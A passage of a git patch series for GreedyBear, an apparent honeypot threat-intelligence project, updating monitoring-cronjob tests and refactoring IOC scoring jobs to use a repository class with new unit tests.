+        mock_elastic_repo.has_honeypot_been_hit.return_value = True
+        cronjob = MonitorHoneypots(minutes_back=60)
+        cronjob.log = MagicMock()
+
+        # Run the cronjob
+        cronjob.execute()
+
+        self.assertEqual(mock_elastic_repo.has_honeypot_been_hit.call_count, 2)
+
+        info_calls = [call[0][0] for call in cronjob.log.info.call_args_list]
+        warning_calls = [call[0][0] for call in cronjob.log.warning.call_args_list]
+
+        self.assertEqual(len([msg for msg in info_calls if "logs available" in msg]), 2)
+        self.assertEqual(len(warning_calls), 0)
+
+    @patch("greedybear.cronjobs.monitor_honeypots.ElasticRepository")
+    def test_run_some_active_honeypots_are_hit(self, mock_elastic_repo_class):
+        # Setup mock responses
+        mock_elastic_repo = mock_elastic_repo_class.return_value
+        mock_elastic_repo.has_honeypot_been_hit.side_effect = [True, False]
+        cronjob = MonitorHoneypots(minutes_back=60)
+        cronjob.log = MagicMock()
+
+        # Run the cronjob
+        cronjob.execute()
+
+        self.assertEqual(mock_elastic_repo.has_honeypot_been_hit.call_count, 2)
+
+        info_calls = [call[0][0] for call in cronjob.log.info.call_args_list]
+        warning_calls = [call[0][0] for call in cronjob.log.warning.call_args_list]
+
+        self.assertEqual(len([msg for msg in info_calls if "logs available" in msg]), 1)
+        self.assertEqual(len(warning_calls), 1)
+
+    @patch("greedybear.cronjobs.monitor_honeypots.ElasticRepository")
+    def test_run_no_active_honeypots_are_hit(self, mock_elastic_repo_class):
+        # Setup mock responses
+        mock_elastic_repo = mock_elastic_repo_class.return_value
+        mock_elastic_repo.has_honeypot_been_hit.return_value = False
+        cronjob = MonitorHoneypots(minutes_back=60)
+        cronjob.log = MagicMock()
+
+        # Run the cronjob
+        cronjob.execute()
+
+        self.assertEqual(mock_elastic_repo.has_honeypot_been_hit.call_count, 2)
+
+        info_calls = [call[0][0] for call in cronjob.log.info.call_args_list]
+        warning_calls = [call[0][0] for call in cronjob.log.warning.call_args_list]
+
+        self.assertEqual(len([msg for msg in info_calls if "logs available" in msg]), 0)
+        self.assertEqual(len(warning_calls), 2)
diff --git a/tests/greedybear/cronjobs/test_monitor_logs.py b/tests/greedybear/cronjobs/test_monitor_logs.py
new file mode 100644
index 00000000..651b8a94
--- /dev/null
+++ b/tests/greedybear/cronjobs/test_monitor_logs.py
@@ -0,0 +1,78 @@
+from datetime import datetime, timedelta
+from pathlib import Path
+from unittest import TestCase
+from unittest.mock import MagicMock, patch
+
+from greedybear.cronjobs.monitor_logs import MonitorLogs
+
+
+class MonitorLogsTestCase(TestCase):
+    @patch("greedybear.cronjobs.monitor_logs.Path.exists")
+    @patch("greedybear.cronjobs.monitor_logs.Path.stat")
+    @patch("greedybear.cronjobs.monitor_logs.send_message")
+    def test_run_all_recent_logs(self, mock_send, mock_stat, mock_exists):
+        # Setup mock responses
+        mock_exists.return_value = True
+
+        # Simulate all recent activity
+        recent_time = datetime.now().timestamp()
+        mock_stat.return_value.st_mtime = recent_time
+
+        # Run the cronjob
+        cronjob = MonitorLogs()
+        cronjob.execute()
+
+        self.assertEqual(mock_send.call_count, 4)
+
+    @patch("greedybear.cronjobs.monitor_logs.Path.exists")
+    @patch("greedybear.cronjobs.monitor_logs.Path.stat")
+    @patch("greedybear.cronjobs.monitor_logs.send_message")
+    def test_run_some_recent_logs(self, mock_send, mock_stat, mock_exists):
+        # Setup mock responses
+        mock_exists.return_value = True
+
+        recent_time = datetime.now().timestamp()
+        old_time = (datetime.now() - timedelta(hours=2)).timestamp()
+
+        # Side effect for multiple calls
+        mock_stat.side_effect = [
+            MagicMock(spec=["st_mtime"], st_mtime=recent_time),
+            MagicMock(spec=["st_mtime"], st_mtime=old_time),
+            MagicMock(spec=["st_mtime"], st_mtime=old_time),
+            MagicMock(spec=["st_mtime"], st_mtime=old_time),
+        ]
+
+        # Run the cronjob
+        cronjob = MonitorLogs()
+        cronjob.execute()
+
+        mock_send.assert_called_once_with("found errors in log file greedybear_errors.log")
+
+    @patch("greedybear.cronjobs.monitor_logs.Path.exists")
+    @patch("greedybear.cronjobs.monitor_logs.Path.stat")
+    @patch("greedybear.cronjobs.monitor_logs.send_message")
+    def test_run_no_recent_logs(self, mock_send, mock_stat, mock_exists):
+        # Setup mock responses
+        mock_exists.return_value = True
+
+        # Simulate no recent activity
+        mock_stat.return_value.st_mtime = (datetime.now() - timedelta(hours=3)).timestamp()
+
+        # Run the cronjob
+        cronjob = MonitorLogs()
+        cronjob.execute()
+
+        mock_send.assert_not_called()
+
+    @patch("greedybear.cronjobs.monitor_logs.Path.exists")
+    @patch("greedybear.cronjobs.monitor_logs.Path.stat")
+    @patch("greedybear.cronjobs.monitor_logs.send_message")
+    def test_run_no_file(self, mock_send, mock_stat, mock_exists):
+        # Setup mock responses
+        mock_exists.return_value = False
+
+        # Run the cronjob
+        cronjob = MonitorLogs()
+        cronjob.execute()
+
+        mock_send.assert_not_called()

From 0a49f504ae3560b699fa2e5be6995211e2f04191 Mon Sep 17 00:00:00 2001
From: Amisha Chhajed <136238836+amishhaa@users.noreply.github.com>
Date: Sun, 11 Jan 2026 02:12:26 +0530
Subject: [PATCH 38/75] fix-tests (#695)

---
 .../greedybear/cronjobs/test_monitor_logs.py  | 51 +++++++++++--------
 1 file changed, 29 insertions(+), 22 deletions(-)

diff --git a/tests/greedybear/cronjobs/test_monitor_logs.py b/tests/greedybear/cronjobs/test_monitor_logs.py
index 651b8a94..9c3052e6 100644
--- a/tests/greedybear/cronjobs/test_monitor_logs.py
+++ b/tests/greedybear/cronjobs/test_monitor_logs.py
@@ -1,5 +1,4 @@
 from datetime import datetime, timedelta
-from pathlib import Path
 from unittest import TestCase
 from unittest.mock import MagicMock, patch
 
@@ -7,67 +6,74 @@
 
 
 class MonitorLogsTestCase(TestCase):
+    @patch("greedybear.cronjobs.monitor_logs.send_ntfy_message")
+    @patch("greedybear.cronjobs.monitor_logs.send_slack_message")
     @patch("greedybear.cronjobs.monitor_logs.Path.exists")
     @patch("greedybear.cronjobs.monitor_logs.Path.stat")
-    @patch("greedybear.cronjobs.monitor_logs.send_message")
-    def test_run_all_recent_logs(self, mock_send, mock_stat, mock_exists):
+    def test_run_all_recent_logs(self, mock_stat, mock_exists, mock_slack, mock_ntfy):
         # Setup mock responses
         mock_exists.return_value = True
 
         # Simulate all recent activity
         recent_time = datetime.now().timestamp()
-        mock_stat.return_value.st_mtime = recent_time
+        mock_stat.return_value = MagicMock(st_mtime=recent_time)
 
         # Run the cronjob
         cronjob = MonitorLogs()
         cronjob.execute()
 
-        self.assertEqual(mock_send.call_count, 4)
+        self.assertEqual(mock_slack.call_count, 4)
+        self.assertEqual(mock_ntfy.call_count, 4)
 
+    @patch("greedybear.cronjobs.monitor_logs.send_ntfy_message")
+    @patch("greedybear.cronjobs.monitor_logs.send_slack_message")
     @patch("greedybear.cronjobs.monitor_logs.Path.exists")
     @patch("greedybear.cronjobs.monitor_logs.Path.stat")
-    @patch("greedybear.cronjobs.monitor_logs.send_message")
-    def test_run_some_recent_logs(self, mock_send, mock_stat, mock_exists):
+    def test_run_some_recent_logs(self, mock_stat, mock_exists, mock_slack, mock_ntfy):
         # Setup mock responses
         mock_exists.return_value = True
 
+        # Simulate all recent activity
         recent_time = datetime.now().timestamp()
         old_time = (datetime.now() - timedelta(hours=2)).timestamp()
 
-        # Side effect for multiple calls
         mock_stat.side_effect = [
-            MagicMock(spec=["st_mtime"], st_mtime=recent_time),
-            MagicMock(spec=["st_mtime"], st_mtime=old_time),
-            MagicMock(spec=["st_mtime"], st_mtime=old_time),
-            MagicMock(spec=["st_mtime"], st_mtime=old_time),
+            MagicMock(st_mtime=recent_time),  # greedybear
+            MagicMock(st_mtime=old_time),  # api
+            MagicMock(st_mtime=old_time),  # django
+            MagicMock(st_mtime=old_time),  # celery
         ]
 
         # Run the cronjob
         cronjob = MonitorLogs()
         cronjob.execute()
 
-        mock_send.assert_called_once_with("found errors in log file greedybear_errors.log")
+        mock_slack.assert_called_once_with("found errors in log file greedybear_errors.log")
+        self.assertEqual(mock_ntfy.call_count, 1)
 
+    @patch("greedybear.cronjobs.monitor_logs.send_ntfy_message")
+    @patch("greedybear.cronjobs.monitor_logs.send_slack_message")
     @patch("greedybear.cronjobs.monitor_logs.Path.exists")
     @patch("greedybear.cronjobs.monitor_logs.Path.stat")
-    @patch("greedybear.cronjobs.monitor_logs.send_message")
-    def test_run_no_recent_logs(self, mock_send, mock_stat, mock_exists):
+    def test_run_no_recent_logs(self, mock_stat, mock_exists, mock_slack, mock_ntfy):
         # Setup mock responses
         mock_exists.return_value = True
 
-        # Simulate no recent activity
-        mock_stat.return_value.st_mtime = (datetime.now() - timedelta(hours=3)).timestamp()
+        # Simulate all recent activity
+        old_time = (datetime.now() - timedelta(hours=3)).timestamp()
+        mock_stat.return_value = MagicMock(st_mtime=old_time)
 
         # Run the cronjob
         cronjob = MonitorLogs()
         cronjob.execute()
 
-        mock_send.assert_not_called()
+        mock_slack.assert_not_called()
+        mock_ntfy.assert_not_called()
 
+    @patch("greedybear.cronjobs.monitor_logs.send_ntfy_message")
+    @patch("greedybear.cronjobs.monitor_logs.send_slack_message")
     @patch("greedybear.cronjobs.monitor_logs.Path.exists")
-    @patch("greedybear.cronjobs.monitor_logs.Path.stat")
-    @patch("greedybear.cronjobs.monitor_logs.send_message")
-    def test_run_no_file(self, mock_send, mock_stat, mock_exists):
+    def test_run_no_file(self, mock_exists, mock_slack, mock_ntfy):
         # Setup mock responses
         mock_exists.return_value = False
 
@@ -75,4 +81,5 @@ def test_run_no_file(self, mock_send, mock_stat, mock_exists):
         cronjob = MonitorLogs()
         cronjob.execute()
 
-        mock_send.assert_not_called()
+        mock_slack.assert_not_called()
+        mock_ntfy.assert_not_called()

From 1f64f764993d96926bafaee023a860e48117c288 Mon Sep 17 00:00:00 2001
From: tim <tim.leonhard@posteo.de>
Date: Sat, 10 Jan 2026 22:03:01 +0100
Subject: [PATCH 39/75] Remove unused GeneralHoneypot creation from
 MonitorLogsTestCase

---
 tests/greedybear/cronjobs/test_monitor_honeypots.py | 9 ++-------
 1 file changed, 2 insertions(+), 7 deletions(-)

diff --git a/tests/greedybear/cronjobs/test_monitor_honeypots.py b/tests/greedybear/cronjobs/test_monitor_honeypots.py
index b4482eac..cd9a3c9e 100644
--- a/tests/greedybear/cronjobs/test_monitor_honeypots.py
+++ b/tests/greedybear/cronjobs/test_monitor_honeypots.py
@@ -1,15 +1,10 @@
 from unittest.mock import MagicMock, patch
 
-from django.test import TestCase
 from greedybear.cronjobs.monitor_honeypots import MonitorHoneypots
-from greedybear.models import GeneralHoneypot
+from tests import CustomTestCase
 
 
-class MonitorHoneypotsTestCase(TestCase):
-    def setUp(self):
-        """Creating two honeypots in the database for testing."""
-        self.honeypot1 = GeneralHoneypot.objects.create(name="Log4pot", active=True)
-        self.honeypot2 = GeneralHoneypot.objects.create(name="Cowrie", active=True)
+class MonitorHoneypotsTestCase(CustomTestCase):
 
     @patch("greedybear.cronjobs.monitor_honeypots.ElasticRepository")
     def test_run_all_active_honeypots_are_hit(self, mock_elastic_repo_class):

From 550bb56a4549570d708ce0ff401de2a9a740c938 Mon Sep 17 00:00:00 2001
From: Krishna Awasthi <140143710+opbot-xd@users.noreply.github.com>
Date: Mon, 12 Jan 2026 00:57:21 +0530
Subject: [PATCH 40/75] Refactor scoring jobs to use IocRepository. Addresses
 #633 (#696)

* Refactor scoring jobs to use IocRepository

- Add scoring-specific methods to IocRepository:
  - get_scanners_for_scoring(): Fetch scanners for scoring updates
  - get_scanners_by_pks(): Retrieve scanners by primary keys
  - get_recent_scanners(): Get scanners seen after cutoff date
  - bulk_update_scores(): Bulk update score fields

- Refactor UpdateScores to use dependency injection with IocRepository
  - Add optional ioc_repo parameter (backward compatible)
  - Replace IOC.objects.filter() with repository methods
  - Replace IOC.objects.bulk_update() with repository.bulk_update_scores()

- Update utility functions to accept IocRepository parameter:
  - get_current_data(days_lookback, ioc_repo)
  - get_data_by_pks(primary_keys, ioc_repo)

- Remove unused Django ORM imports (Q, F, ArrayAgg, IOC model)

- Add comprehensive test coverage (47 tests total):
  - 11 basic repository method tests
  - 10 edge case tests (empty results, inactive honeypots, etc.)
  - 6 integration tests proving end-to-end functionality
  - All tests passing with full Ruff compliance

This change improves testability and consistency with the extraction
pipeline. Addresses Phase 1 of issue #633.

* style: format test_monitor_honeypots.py with ruff

* fix: update GeneralHoneypotViewTestCase for dynamic test data

* refactor: improve code style per maintainer feedback

- Move all Django imports (ArrayAgg, F, Q) to module top
- Use ternary operators for cleaner None checks
- Fix test_200_active_general_honeypots to properly verify filtering logic

Changes:
- ioc.py: Moved imports to top, removed duplicates from methods
- scoring_jobs.py: Simplified __init__ and update_db with ternary operators
- utils.py: Moved IocRepository import to top, simplified both functions
- test_views.py: Restored proper active/inactive honeypot filtering assertions

Addresses code review comments from @regulartim

* refactor: move IocRepository import to module top

- Move IocRepository import from UpdateScores.__init__ to module level
- Consistent with maintainer's feedback on keeping all imports at top
- No circular dependency issue, safe to move
---
 greedybear/cronjobs/repositories/ioc.py       |  79 +++++
 greedybear/cronjobs/scoring/scoring_jobs.py   |  17 +-
 greedybear/cronjobs/scoring/utils.py          |  33 +-
 .../cronjobs/test_monitor_honeypots.py        |   1 -
 tests/test_repositories.py                    | 321 ++++++++++++++++++
 tests/test_views.py                           |  15 +-
 6 files changed, 426 insertions(+), 40 deletions(-)

diff --git a/greedybear/cronjobs/repositories/ioc.py b/greedybear/cronjobs/repositories/ioc.py
index f9ef046b..7b0016d8 100644
--- a/greedybear/cronjobs/repositories/ioc.py
+++ b/greedybear/cronjobs/repositories/ioc.py
@@ -1,5 +1,8 @@
 import logging
 
+from django.contrib.postgres.aggregates import ArrayAgg
+from django.db.models import F, Q
+
 from greedybear.models import IOC, GeneralHoneypot
 
 
@@ -146,3 +149,79 @@ def save(self, ioc: IOC) -> IOC:
         """
         ioc.save()
         return ioc
+
+    def get_scanners_for_scoring(self, score_fields: list[str]) -> list[IOC]:
+        """
+        Get all scanners associated with active honeypots for scoring.
+
+        Retrieves IOCs that are marked as scanners and are associated with either
+        Cowrie, Log4j, or active general honeypots. Returns only the name field
+        and specified score fields for efficiency.
+
+        Args:
+            score_fields: List of score field names to retrieve (e.g., ['recurrence_probability']).
+
+        Returns:
+            QuerySet of IOC objects with only name and score fields loaded.
+        """
+        return IOC.objects.filter(Q(cowrie=True) | Q(log4j=True) | Q(general_honeypot__active=True)).filter(scanner=True).distinct().only("name", *score_fields)
+
+    def get_scanners_by_pks(self, primary_keys: set[int]):
+        """
+        Retrieve scanners by their primary keys with related honeypot data.
+
+        Args:
+            primary_keys: Set of IOC primary keys to retrieve.
+
+        Returns:
+            QuerySet of IOC objects with prefetched general_honeypot relationships
+            and annotated with value and honeypots fields.
+        """
+        return (
+            IOC.objects.filter(pk__in=primary_keys)
+            .prefetch_related("general_honeypot")
+            .annotate(value=F("name"))
+            .annotate(honeypots=ArrayAgg("general_honeypot__name"))
+            .values()
+        )
+
+    def get_recent_scanners(self, cutoff_date, days_lookback: int = 30):
+        """
+        Get scanners seen after a specific cutoff date.
+
+        Retrieves IOCs that are marked as scanners, associated with active honeypots,
+        and have been seen after the specified cutoff date.
+
+        Args:
+            cutoff_date: DateTime threshold - only IOCs seen after this will be returned.
+            days_lookback: Number of days to look back (used for logging, not query).
+
+        Returns:
+            QuerySet of IOC objects with prefetched relationships and annotations.
+        """
+        return (
+            IOC.objects.filter(Q(cowrie=True) | Q(log4j=True) | Q(general_honeypot__active=True))
+            .filter(last_seen__gte=cutoff_date, scanner=True)
+            .prefetch_related("general_honeypot")
+            .annotate(value=F("name"))
+            .annotate(honeypots=ArrayAgg("general_honeypot__name"))
+            .values()
+        )
+
+    def bulk_update_scores(self, iocs: list[IOC], score_fields: list[str], batch_size: int = 1000) -> int:
+        """
+        Bulk update IOC score fields in the database.
+
+        Args:
+            iocs: List of IOC objects with updated score values.
+            score_fields: List of field names to update (e.g., ['recurrence_probability']).
+            batch_size: Number of objects to update per database query.
+
+        Returns:
+            Number of objects updated (Note: Django's bulk_update returns None,
+            so we return the count of iocs provided).
+        """
+        if not iocs:
+            return 0
+        IOC.objects.bulk_update(iocs, score_fields, batch_size=batch_size)
+        return len(iocs)
diff --git a/greedybear/cronjobs/scoring/scoring_jobs.py b/greedybear/cronjobs/scoring/scoring_jobs.py
index 015a40b7..95e1830d 100644
--- a/greedybear/cronjobs/scoring/scoring_jobs.py
+++ b/greedybear/cronjobs/scoring/scoring_jobs.py
@@ -5,9 +5,9 @@
 import pandas as pd
 from django.core.files.base import ContentFile
 from django.core.files.storage import FileSystemStorage
-from django.db.models import Q
 
 from greedybear.cronjobs.base import Cronjob
+from greedybear.cronjobs.repositories import IocRepository
 from greedybear.cronjobs.scoring.random_forest import RFClassifier, RFRegressor
 from greedybear.cronjobs.scoring.utils import (
     correlated_features,
@@ -149,9 +149,10 @@ class UpdateScores(Cronjob):
     Designed to run as a scheduled cronjob.
     """
 
-    def __init__(self):
+    def __init__(self, ioc_repo=None):
         super().__init__()
         self.data = None
+        self.ioc_repo = ioc_repo if ioc_repo is not None else IocRepository()
 
     def update_db(self, df: pd.DataFrame, iocs: set[IOC] = None) -> int:
         """
@@ -173,15 +174,11 @@ def update_db(self, df: pd.DataFrame, iocs: set[IOC] = None) -> int:
             int: The number of objects updated in the database.
         """
         self.log.info("begin updating scores")
-        reset_old_scores = False
+        reset_old_scores = iocs is None
         score_names = [s.score_name for s in SCORERS]
         scores_by_ip = df.set_index("value")[score_names].to_dict("index")
-        # If no IoCs were passed as an argument, fetch all IoCs
-        if iocs is None:
-            iocs = (
-                IOC.objects.filter(Q(cowrie=True) | Q(log4j=True) | Q(general_honeypot__active=True)).filter(scanner=True).distinct().only("name", *score_names)
-            )
-            reset_old_scores = True
+        # If no IoCs were passed as an argument, fetch all IoCs via repository
+        iocs = self.ioc_repo.get_scanners_for_scoring(score_names) if iocs is None else iocs
         iocs_to_update = []
 
         self.log.info(f"checking {len(iocs)} IoCs")
@@ -203,7 +200,7 @@ def update_db(self, df: pd.DataFrame, iocs: set[IOC] = None) -> int:
             if updated:
                 iocs_to_update.append(ioc)
         self.log.info(f"writing updated scores for {len(iocs_to_update)} IoCs to DB")
-        result = IOC.objects.bulk_update(iocs_to_update, score_names, batch_size=1000) if iocs_to_update else 0
+        result = self.ioc_repo.bulk_update_scores(iocs_to_update, score_names)
         self.log.info(f"{result} IoCs were updated")
         return result
 
diff --git a/greedybear/cronjobs/scoring/utils.py b/greedybear/cronjobs/scoring/utils.py
index 878554e2..6e097203 100644
--- a/greedybear/cronjobs/scoring/utils.py
+++ b/greedybear/cronjobs/scoring/utils.py
@@ -3,11 +3,9 @@
 
 import numpy as np
 import pandas as pd
-from django.contrib.postgres.aggregates import ArrayAgg
-from django.db.models import F, Q
 
 from api.views.utils import FeedRequestParams, feeds_response
-from greedybear.models import IOC
+from greedybear.cronjobs.repositories import IocRepository
 
 
 @cache
@@ -147,28 +145,24 @@ def serialize_iocs(iocs: list[dict]) -> list[dict]:
     )["iocs"]
 
 
-def get_data_by_pks(primary_keys: set) -> list[dict]:
+def get_data_by_pks(primary_keys: set, ioc_repo=None) -> list[dict]:
     """
     Retrieve and serialize IOC data for a collection of primary keys.
 
     Args:
         primary_keys: A set of IOC primary keys to retrieve from the database.
+        ioc_repo: Optional IocRepository instance. If None, creates a new one.
 
     Returns:
         list: Serialized IOC data including associated honeypot names.
               Processed through feeds_response API method.
     """
-    iocs = (
-        IOC.objects.filter(pk__in=primary_keys)
-        .prefetch_related("general_honeypot")
-        .annotate(value=F("name"))
-        .annotate(honeypots=ArrayAgg("general_honeypot__name"))
-        .values()
-    )
+    ioc_repo = ioc_repo if ioc_repo is not None else IocRepository()
+    iocs = ioc_repo.get_scanners_by_pks(primary_keys)
     return serialize_iocs(iocs)
 
 
-def get_current_data(days_lookback: int = 30) -> list[dict]:
+def get_current_data(days_lookback: int = 30, ioc_repo=None) -> list[dict]:
     """
     Get current IOC data for scanners seen in the last N days.
 
@@ -180,22 +174,13 @@ def get_current_data(days_lookback: int = 30) -> list[dict]:
     Args:
         days_lookback: Number of days to look back for last_seen timestamp.
             Defaults to 30 days.
+        ioc_repo: Optional IocRepository instance. If None, creates a new one.
 
     Returns:
         list: Serialized IOC data including associated honeypot names.
               Processed through feeds_response API method.
     """
+    ioc_repo = ioc_repo if ioc_repo is not None else IocRepository()
     cutoff_date = datetime.now() - timedelta(days=days_lookback)
-    query_dict = {
-        "last_seen__gte": cutoff_date,
-        "scanner": True,
-    }
-    iocs = (
-        IOC.objects.filter(Q(cowrie=True) | Q(log4j=True) | Q(general_honeypot__active=True))
-        .filter(**query_dict)
-        .prefetch_related("general_honeypot")
-        .annotate(value=F("name"))
-        .annotate(honeypots=ArrayAgg("general_honeypot__name"))
-        .values()
-    )
+    iocs = ioc_repo.get_recent_scanners(cutoff_date, days_lookback)
     return serialize_iocs(iocs)
diff --git a/tests/greedybear/cronjobs/test_monitor_honeypots.py b/tests/greedybear/cronjobs/test_monitor_honeypots.py
index cd9a3c9e..5b6bf160 100644
--- a/tests/greedybear/cronjobs/test_monitor_honeypots.py
+++ b/tests/greedybear/cronjobs/test_monitor_honeypots.py
@@ -5,7 +5,6 @@
 
 
 class MonitorHoneypotsTestCase(CustomTestCase):
-
     @patch("greedybear.cronjobs.monitor_honeypots.ElasticRepository")
     def test_run_all_active_honeypots_are_hit(self, mock_elastic_repo_class):
         # Setup mock responses
diff --git a/tests/test_repositories.py b/tests/test_repositories.py
index 7544f232..613a7cf3 100644
--- a/tests/test_repositories.py
+++ b/tests/test_repositories.py
@@ -174,6 +174,327 @@ def test_special_and_normal_honeypots(self):
         self.assertFalse(repo.is_ready_for_extraction("NormalPot"))
         self.assertFalse(repo.is_ready_for_extraction("normalpot"))
 
+    def test_get_scanners_for_scoring_returns_scanners(self):
+        # Create scanners
+        IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True)
+        IOC.objects.create(name="5.6.7.8", type="ip", scanner=True, log4j=True)
+
+        result = self.repo.get_scanners_for_scoring(["recurrence_probability", "expected_interactions"])
+
+        names = [ioc.name for ioc in result]
+        self.assertIn("1.2.3.4", names)
+        self.assertIn("5.6.7.8", names)
+
+    def test_get_scanners_for_scoring_excludes_non_scanners(self):
+        IOC.objects.create(name="1.2.3.4", type="ip", scanner=False, cowrie=True)
+
+        result = self.repo.get_scanners_for_scoring(["recurrence_probability"])
+
+        names = [ioc.name for ioc in result]
+        self.assertNotIn("1.2.3.4", names)
+
+    def test_get_scanners_for_scoring_only_loads_specified_fields(self):
+        IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True, attack_count=100)
+
+        result = list(self.repo.get_scanners_for_scoring(["recurrence_probability"]))
+
+        # Check that our created IOC is in the results
+        names = [ioc.name for ioc in result]
+        self.assertIn("1.2.3.4", names)
+        # Verify name field is accessible (field was loaded)
+        test_ioc = next(ioc for ioc in result if ioc.name == "1.2.3.4")
+        self.assertEqual(test_ioc.name, "1.2.3.4")
+
+    def test_get_scanners_by_pks_returns_correct_iocs(self):
+        ioc1 = IOC.objects.create(name="1.2.3.4", type="ip")
+        ioc2 = IOC.objects.create(name="5.6.7.8", type="ip")
+        IOC.objects.create(name="9.10.11.12", type="ip")  # Should not be returned
+
+        result = list(self.repo.get_scanners_by_pks({ioc1.pk, ioc2.pk}))
+
+        self.assertEqual(len(result), 2)
+        values = [r["value"] for r in result]
+        self.assertIn("1.2.3.4", values)
+        self.assertIn("5.6.7.8", values)
+        self.assertNotIn("9.10.11.12", values)
+
+    def test_get_scanners_by_pks_includes_honeypot_annotation(self):
+        hp = GeneralHoneypot.objects.create(name="TestPot", active=True)
+        ioc = IOC.objects.create(name="1.2.3.4", type="ip")
+        ioc.general_honeypot.add(hp)
+
+        result = list(self.repo.get_scanners_by_pks({ioc.pk}))
+
+        self.assertEqual(len(result), 1)
+        self.assertIn("honeypots", result[0])
+
+    def test_get_recent_scanners_returns_recent_only(self):
+        from datetime import datetime, timedelta
+
+        recent_date = datetime.now() - timedelta(days=5)
+        old_date = datetime.now() - timedelta(days=40)
+
+        IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True, last_seen=recent_date)
+        IOC.objects.create(name="5.6.7.8", type="ip", scanner=True, cowrie=True, last_seen=old_date)
+
+        cutoff = datetime.now() - timedelta(days=30)
+        result = list(self.repo.get_recent_scanners(cutoff, days_lookback=30))
+
+        values = [r["value"] for r in result]
+        self.assertIn("1.2.3.4", values)
+        self.assertNotIn("5.6.7.8", values)
+
+    def test_get_recent_scanners_excludes_non_scanners(self):
+        from datetime import datetime, timedelta
+
+        recent_date = datetime.now() - timedelta(days=5)
+        IOC.objects.create(name="1.2.3.4", type="ip", scanner=False, cowrie=True, last_seen=recent_date)
+
+        cutoff = datetime.now() - timedelta(days=30)
+        result = list(self.repo.get_recent_scanners(cutoff))
+
+        values = [r["value"] for r in result]
+        self.assertNotIn("1.2.3.4", values)
+
+    def test_bulk_update_scores_updates_multiple_iocs(self):
+        ioc1 = IOC.objects.create(name="1.2.3.4", type="ip", recurrence_probability=0.0)
+        ioc2 = IOC.objects.create(name="5.6.7.8", type="ip", recurrence_probability=0.0)
+
+        ioc1.recurrence_probability = 0.75
+        ioc2.recurrence_probability = 0.85
+
+        result = self.repo.bulk_update_scores([ioc1, ioc2], ["recurrence_probability"])
+
+        self.assertEqual(result, 2)
+        updated1 = IOC.objects.get(name="1.2.3.4")
+        updated2 = IOC.objects.get(name="5.6.7.8")
+        self.assertEqual(updated1.recurrence_probability, 0.75)
+        self.assertEqual(updated2.recurrence_probability, 0.85)
+
+    def test_bulk_update_scores_returns_zero_for_empty_list(self):
+        result = self.repo.bulk_update_scores([], ["recurrence_probability"])
+        self.assertEqual(result, 0)
+
+    def test_bulk_update_scores_updates_multiple_fields(self):
+        ioc = IOC.objects.create(name="1.2.3.4", type="ip", recurrence_probability=0.0, expected_interactions=0.0)
+
+        ioc.recurrence_probability = 0.75
+        ioc.expected_interactions = 10.5
+
+        result = self.repo.bulk_update_scores([ioc], ["recurrence_probability", "expected_interactions"])
+
+        self.assertEqual(result, 1)
+        updated = IOC.objects.get(name="1.2.3.4")
+        self.assertEqual(updated.recurrence_probability, 0.75)
+        self.assertEqual(updated.expected_interactions, 10.5)
+
+    # Edge case tests
+    def test_get_scanners_for_scoring_returns_empty_when_no_scanners(self):
+        # Delete all existing scanners
+        IOC.objects.filter(scanner=True).delete()
+
+        result = list(self.repo.get_scanners_for_scoring(["recurrence_probability"]))
+
+        self.assertEqual(len(result), 0)
+
+    def test_get_scanners_for_scoring_excludes_inactive_honeypots(self):
+        hp = GeneralHoneypot.objects.create(name="InactivePot", active=False)
+        ioc = IOC.objects.create(name="1.2.3.4", type="ip", scanner=True)
+        ioc.general_honeypot.add(hp)
+
+        result = list(self.repo.get_scanners_for_scoring(["recurrence_probability"]))
+
+        names = [ioc.name for ioc in result]
+        self.assertNotIn("1.2.3.4", names)
+
+    def test_get_scanners_for_scoring_with_multiple_honeypots(self):
+        hp1 = GeneralHoneypot.objects.create(name="Pot1", active=True)
+        hp2 = GeneralHoneypot.objects.create(name="Pot2", active=True)
+        ioc = IOC.objects.create(name="1.2.3.4", type="ip", scanner=True)
+        ioc.general_honeypot.add(hp1, hp2)
+
+        result = list(self.repo.get_scanners_for_scoring(["recurrence_probability"]))
+
+        names = [ioc.name for ioc in result]
+        # Should appear only once despite multiple honeypots (distinct)
+        self.assertEqual(names.count("1.2.3.4"), 1)
+
+    def test_get_scanners_by_pks_with_empty_set(self):
+        result = list(self.repo.get_scanners_by_pks(set()))
+
+        self.assertEqual(len(result), 0)
+
+    def test_get_scanners_by_pks_with_nonexistent_pks(self):
+        result = list(self.repo.get_scanners_by_pks({99999, 99998}))
+
+        self.assertEqual(len(result), 0)
+
+    def test_get_scanners_by_pks_ioc_with_no_honeypots(self):
+        ioc = IOC.objects.create(name="1.2.3.4", type="ip")
+
+        result = list(self.repo.get_scanners_by_pks({ioc.pk}))
+
+        self.assertEqual(len(result), 1)
+        self.assertIn("honeypots", result[0])
+
+    def test_get_recent_scanners_all_iocs_older_than_cutoff(self):
+        from datetime import datetime, timedelta
+
+        old_date = datetime.now() - timedelta(days=40)
+        IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True, last_seen=old_date)
+
+        cutoff = datetime.now() - timedelta(days=30)
+        result = list(self.repo.get_recent_scanners(cutoff))
+
+        values = [r["value"] for r in result]
+        self.assertNotIn("1.2.3.4", values)
+
+    def test_get_recent_scanners_with_inactive_honeypot(self):
+        from datetime import datetime, timedelta
+
+        hp = GeneralHoneypot.objects.create(name="InactivePot", active=False)
+        recent_date = datetime.now() - timedelta(days=5)
+        ioc = IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, last_seen=recent_date)
+        ioc.general_honeypot.add(hp)
+
+        cutoff = datetime.now() - timedelta(days=30)
+        result = list(self.repo.get_recent_scanners(cutoff))
+
+        values = [r["value"] for r in result]
+        self.assertNotIn("1.2.3.4", values)
+
+    def test_bulk_update_scores_with_custom_batch_size(self):
+        ioc1 = IOC.objects.create(name="1.2.3.4", type="ip", recurrence_probability=0.0)
+        ioc2 = IOC.objects.create(name="5.6.7.8", type="ip", recurrence_probability=0.0)
+
+        ioc1.recurrence_probability = 0.75
+        ioc2.recurrence_probability = 0.85
+
+        result = self.repo.bulk_update_scores([ioc1, ioc2], ["recurrence_probability"], batch_size=1)
+
+        self.assertEqual(result, 2)
+        updated1 = IOC.objects.get(name="1.2.3.4")
+        updated2 = IOC.objects.get(name="5.6.7.8")
+        self.assertEqual(updated1.recurrence_probability, 0.75)
